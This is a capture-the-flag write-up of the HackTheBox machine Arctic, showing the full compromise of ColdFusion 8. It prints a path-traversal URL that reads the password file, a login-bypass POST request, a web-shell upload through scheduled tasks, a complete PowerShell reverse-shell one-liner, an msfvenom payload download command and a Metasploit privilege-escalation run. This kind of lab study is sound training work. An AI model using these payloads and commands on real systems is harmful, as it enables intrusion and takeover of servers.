HackTheBox: Arctic

The first step was to run NMap against the machine:

# Nmap 7.80 scan initiated Sat Sep 19 14:54:46 2020 as: nmap -sV -O -sC -p- -oN scan 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.021s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 19 15:00:16 2020 -- 1 IP address (1 host up) scanned in 329.63 seconds

From the output we can see that MSRPC is running on 135 and 49154, and a possible FMTP on port 8500. I investigated port 8500 more closely and after browsing to the port identified that it was running Adobe Coldfusion. Browsing to the administrator login page indicates that its running version 8.

http://10.10.10.11:8500/CFIDE/administrator/index.cfm

There’s an excellent resource by nets.ec regarding coldfusion hacking and using a local file disclosure vulnerability to login to the administration panel. As described on the website, the fist step is to use the LFI vulnerability to view the password.properties file by browsing to:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

This then shows us the hashed password value:

You then copy the hash into the password field and run the following JavaScript script by executing it from the address bar:

javascript:alert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))

This will generate an alert with the HMACed hash.

I then started up BURP and enabled it to intercept HTTP traffic. I made the HTTP request from the coldfusion admin panel. The request needs to be modified within BURP for the cfadminPassword value matches the HMACed value reported in the JavaScript alert. My POST request looked like the following:

POST /CFIDE/administrator/enter.cfm HTTP/1.1

Host: 10.10.10.11:8500

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en

Content-Type: application/x-www-form-urlencoded

Content-Length: 422

Connection: close

Cookie: CFID=100; CFTOKEN=75808739

Upgrade-Insecure-Requests: 1



cfadminPassword=AD8AC0F171DEEACB68EA99CF11A19C4E2CFC9C97&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3Flocale%3D..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%2500en&salt=1601344007175&submit=%23Wed+Mar+22+20%3A53%3A51+EET+2017%0D%0Ardspassword%3D0IA%2FF%5B%5BE%3E%5B%24_6%26+%5C%5CQ%3E%5BK%5C%3DXP++%5Cn%0D%0Apassword%3D2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03%0D%0Aencrypted%3Dtrue

Once this modified POST request is forwarded from BURP to the Coldfusion server, you are then successfully logged in. I then continued to follow the guide to spawn a reverse shell on the machine. I opened the Scheduled Tasks menu on the left side of the Coldfusion admin panel, and created a new scheduled task. I wanted to upload the CFM shell that comes with kali. This can be found at /usr/share/webshells/cfm/cfexec.cfm. I started a python HTTP server on my kali machine to host this shell using the following:

python -m SimpleHTTPServer 8000

I then created the scheduled task in Coldfusion making sure to input the URL of the shell on my Kali machine and the location for where I wanted the shell to be saved. This can be found under mappings.

I then submitted the scheduled task, executed it, then browsed to where I chose to save the shell. I was greeted with the shell meaning the scheduled task worked successfully in downloading and saving the shell from my kali machine:

I then entered the “c:\windows\system32\cmd.exe” into the command textbox and in the options box the following command:

/c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.34',2700);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" > C:\ColdFusion8\wwwroot\bs.txt

This will create a reverse shell to my kali machine on port 2700. I opened MSFCONSOLE and started a multi handler on port 2700. I then executed the powershell reverseshell from the coldfusion shell web interface:

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2700
lport => 2700
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.34:2700 
[*] Command shell session 1 opened (10.10.14.34:2700 -> 10.10.10.11:54928) at 2020-09-28 13:07:26 -0400

S C:\ColdFusion8\runtime\bin> cd /
PS C:\> cd Users
PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
d----         22/3/2017   8:10 ??            Administrator                     
d-r--         14/7/2009   7:57 ??            Public                            
d----         22/3/2017   9:00 ??            tolis                             


PS C:\Users> cd tolis
PS C:\Users\tolis> cd Desktop
PS C:\Users\tolis\Desktop> ls


    Directory: C:\Users\tolis\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         22/3/2017   9:01 ??         32 user.txt                          


PS C:\Users\tolis\Desktop> cat user.txt 
[REDACTED]

From the output you can see that it executed successfully and I was able to read the user flag.

The next step is to perform privilege escalation. I started this by trying to elevate the basic reverse TCP shell to a meterpreter shell. I used MSF venom to create an exe which can be executed from my current shell to spawn a meterpreter shell.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.38 LPORT=2901 -f exe > 0005.exe

This was then uploaded to the Arctic machine using the following:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.14.38:8000/0005.exe','0005.exe')"

I then started a multi handler in metasploit listening on port 2901, and executed the exploit.

msf5 exploit(windows/http/rejetto_hfs_exec) > use exploit/multi/handler                                                                                                                                                                    
[*] Using configured payload generic/shell_reverse_tcp                                                                                                                                                                                     
msf5 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf5 exploit(multi/handler) > set lport 2901
lport => 2901
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.38:2901 

I then executed the exe:

C:\ColdFusion8\runtime\bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\ColdFusion8\runtime\bin

03/10/2020  09:35 ��    <DIR>          .
03/10/2020  09:35 ��    <DIR>          ..
03/10/2020  09:29 ��            73.802 0005.exe
03/10/2020  09:34 ��    <DIR>          AppData
18/03/2008  12:11 ��            64.512 java2wsdl.exe
19/01/2008  10:59 ��         2.629.632 jikes.exe
18/03/2008  12:11 ��            64.512 jrun.exe
18/03/2008  12:11 ��            71.680 jrunsvc.exe
18/03/2008  12:11 ��             5.120 jrunsvcmsg.dll
18/03/2008  12:11 ��            64.512 jspc.exe
22/03/2017  09:53 ��             1.804 jvm.config
03/10/2020  08:10 ��                84 ll.bat
18/03/2008  12:11 ��            64.512 migrate.exe
18/03/2008  12:11 ��            34.816 portscan.dll
03/10/2020  09:33 ��            12.674 Powerless.bat
03/10/2020  08:11 ��                15 pp.bat
18/03/2008  12:11 ��            64.512 sniffer.exe
03/10/2020  09:35 ��           125.131 thoi.txt
18/03/2008  12:11 ��            78.848 WindowsLogin.dll
18/03/2008  12:11 ��            64.512 wsconfig.exe
22/03/2017  09:53 ��             1.013 wsconfig_jvm.config                                                                                                                                                                                 
18/03/2008  12:11 ��            64.512 wsdl2java.exe                                                                                                                                                                                       
18/03/2008  12:11 ��            64.512 xmlscript.exe                                                                                                                                                                                       
              20 File(s)      3.550.715 bytes                                                                                                                                                                                              
               3 Dir(s)  32.910.712.832 bytes free                                                                                                                                                                                         
                                                                                                                                                                                                                                           
C:\ColdFusion8\runtime\bin>0005.exe                                                                                                                                                                                                        
0005.exe                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                           
C:\ColdFusion8\runtime\bin>

Once executed the meterpreter session was created:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.38:2901 
[*] Sending stage (176195 bytes) to 10.10.10.11
[*] Meterpreter session 2 opened (10.10.14.38:2901 -> 10.10.10.11:53407) at 2020-10-02 06:48:17 -0400
[*] Sending stage (176195 bytes) to 10.10.10.11
[*] Meterpreter session 3 opened (10.10.14.38:2901 -> 10.10.10.11:53379) at 2020-10-02 06:48:18 -0400
[-] Failed to load client script file: /usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb

meterpreter > sysinfo
Computer        : ARCTIC
OS              : Windows 2008 R2 (6.1 Build 7600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >

Now with a meterpreter session, I used the exploit suggester to find a compatible exploit to use against the session:

msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 3
session => 3
msf5 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION          3                yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 17 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[*] Post module execution completed

You can see from the output there there are multiple exploits it suggests will work. I decided to use the MS16-014 in this case. I loaded the exploit, set it to target my meterpreter session and ran it:

msf5 exploit(windows/local/ms16_075_reflection) > use exploit/windows/local/ms16_014_wmi_recv_notif 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set session 3
session => 3
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > show options

Module options (exploit/windows/local/ms16_014_wmi_recv_notif):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.38      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP0/SP1


msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > run

[*] Started reverse TCP handler on 10.10.14.38:4444 
[*] Launching notepad to host the exploit...
[+] Process 300 launched.
[*] Reflectively injecting the exploit DLL into 300...
[*] Injecting exploit into 300...
[*] Exploit injected. Injecting payload into 300...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201283 bytes) to 10.10.10.11
[*] Meterpreter session 4 opened (10.10.14.38:4444 -> 10.10.10.11:53424) at 2020-10-02 06:51:10 -0400

This successfully spawned a privilaged sessions, from here i was able to access the Administrator desktop and retrive the root flag:

meterpreter > cd /users
meterpreter > dir
Listing: C:\users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   0     dir   2017-03-22 13:47:41 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  All Users
40555/r-xr-xr-x   0     dir   2009-07-13 23:20:08 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 01:06:44 -0400  Default User
40555/r-xr-xr-x   4096  dir   2009-07-13 23:20:08 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:57:55 -0400  desktop.ini
40777/rwxrwxrwx   8192  dir   2017-03-22 15:00:00 -0400  tolis

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\users\Administrator
===============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  AppData
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Application Data
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:48 -0400  Contacts
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Cookies
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Documents
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Downloads
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-03-22 14:10:31 -0400  InstallAnywhere
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Links
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Music
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-03-22 13:47:41 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2017-03-22 13:47:42 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw-  524288  fil   2017-03-22 13:47:42 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw-  524288  fil   2017-03-22 13:47:42 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  NetHood
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Pictures
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  PrintHood
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Saved Games
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:48 -0400  Searches
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  SendTo
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2017-03-22 13:47:42 -0400  Templates
40555/r-xr-xr-x   0       dir   2017-03-22 13:47:42 -0400  Videos
100666/rw-rw-rw-  262144  fil   2017-03-22 13:47:42 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2017-03-22 13:47:42 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2017-03-22 13:47:42 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > dir
Listing: C:\users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2017-03-22 13:47:48 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-03-22 15:01:59 -0400  root.txt

meterpreter > cat root.txt
[REDACTED]
meterpreter >

Leave a Reply

Your email address will not be published. Required fields are marked *